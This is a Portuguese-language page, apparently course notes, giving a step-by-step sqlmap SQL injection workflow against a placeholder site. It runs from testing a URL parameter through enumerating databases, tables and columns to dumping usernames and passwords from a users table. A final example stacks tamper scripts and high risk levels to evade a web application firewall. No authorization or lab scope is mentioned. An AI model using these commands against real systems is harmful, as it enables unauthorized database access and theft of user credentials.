Skip to main content

Sqlmap | Solyd One | Ataque específicos

  • Sqlmap | Solyd One | Ataque específicos

🔍 Fluxo de Uso do sqlmap – De forma Visual + Comandos

[1] Identificar o alvo


[2] Testar se é vulnerável a SQLi


[3] Descobrir o SGBD (MySQL, MSSQL, etc.)


[4] Listar os bancos de dados


[5] Escolher e listar tabelas de um banco


[6] Escolher e listar colunas de uma tabela


[7] Extrair os dados das colunas

🔧 Etapas com comandos sqlmap

1. Identifique um ponto de injeção

Por exemplo: http://site.com/produto.php?id=1

2. Testar vulnerabilidade

sqlmap -u "http://site.com/produto.php?id=1" --batch --dbs
  • --batch: aceita opções padrão automaticamente (modo silencioso).
  • --dbs: tenta listar os bancos de dados disponíveis.

3. Descobrir o banco de dados utilizado (DBMS)

sqlmap -u "http://site.com/produto.php?id=1" --batch --dbms

Ou será inferido automaticamente no primeiro comando.

4. Listar os bancos de dados

Se ainda não o fez:

sqlmap -u "http://site.com/produto.php?id=1" --batch --dbs

5. Listar as tabelas de um banco específico

sqlmap -u "http://site.com/produto.php?id=1" -D nome_do_banco --tables

6. Listar colunas de uma tabela específica

sqlmap -u "http://site.com/produto.php?id=1" -D nome_do_banco -T nome_da_tabela --columns

7. Extrair dados

sqlmap -u "http://site.com/produto.php?id=1" -D nome_do_banco -T nome_da_tabela -C coluna1,coluna2 --dump

🎯 Exemplo Prático

sqlmap -u "http://site.com/produto.php?id=1" --dbs --threads=10
# Digamos que retornou: ecommerce

sqlmap -u "http://site.com/produto.php?id=1" -D ecommerce --tables --threads=10
# Retorna: users, orders, products

sqlmap -u "http://site.com/produto.php?id=1" -D ecommerce -T users --columns --threads=10
# Retorna: id, username, password, email

sqlmap -u "http://site.com/produto.php?id=1" -D ecommerce -T users -C username,password --dump --threads=10
# Extrai os dados das colunas selecionadas

Exemplo para aplicações que possuem WAF


sqlmap -u "http://alvo.com/pagina.php?id=1" \
--random-agent \
--tamper=between,space2comment,charunicodeescape \
--technique=BEUSTQ \
--level=5 --risk=3 \
--threads=10 \
--batch